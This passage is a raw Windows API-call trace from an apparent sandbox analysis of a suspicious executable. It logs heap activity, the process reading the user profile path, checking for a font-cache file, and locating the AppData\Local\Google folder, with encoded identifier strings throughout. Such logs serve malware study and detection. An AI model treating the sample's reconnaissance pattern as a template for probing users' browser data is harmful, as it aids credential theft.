0x34aa580 [0209.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0209.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0209.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0209.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0209.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0209.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0209.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0209.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0209.707] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0209.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0209.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9a0 [0209.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0209.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0209.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0209.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0209.707] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0209.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0209.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0209.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0209.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0209.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0209.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0209.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0209.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0209.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0209.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0209.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0209.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0209.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0209.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0209.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0209.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0209.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0209.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0209.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0209.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0209.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0209.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0209.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0209.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0209.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0209.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0209.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0209.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0209.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0209.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0209.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0209.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0209.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0209.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x80) returned 0x24f1fe0 [0209.710] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/GDIPFONTCACHEV1.DAT", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpFilePart=0x8bf658*="GDIPFONTCACHEV1.DAT") returned 0x3f [0209.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0209.710] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat")) returned 0xffffffff [0209.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0209.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0209.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0209.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0209.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0209.711] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0209.711] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.711] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0209.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0209.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0209.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0209.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0209.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0209.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0209.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0209.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0209.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0209.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0209.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0209.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Google", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oogle", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0209.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0209.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0209.712] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0209.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0209.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0209.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0209.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0209.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Google", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0209.713] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0209.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0209.713] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0209.713] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0209.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0209.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0209.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0209.713] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0209.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0209.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa658 [0209.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0209.713] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0209.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0209.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0209.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0209.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0209.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0209.714] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0209.714] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.714] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0209.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0209.714] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0209.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0209.715] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0209.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0209.715] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0209.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0209.715] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Google", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf8052f, dwReserved1=0x86fb, cFileName="Google", cAlternateFileName="")) returned 0xaa5660 [0209.715] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0209.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0209.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0209.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0209.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0209.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0209.716] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0209.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0209.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0209.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0209.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0209.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0209.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0209.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0209.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0209.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0209.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0209.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0209.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0209.718] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0209.718] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0209.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0209.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7a8 [0209.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0209.719] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0209.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0209.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0209.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.719] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0209.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0209.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0209.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0209.720] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0209.720] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0209.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.720] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0209.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0209.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0209.720] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0209.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0209.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0209.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0209.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.721] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd 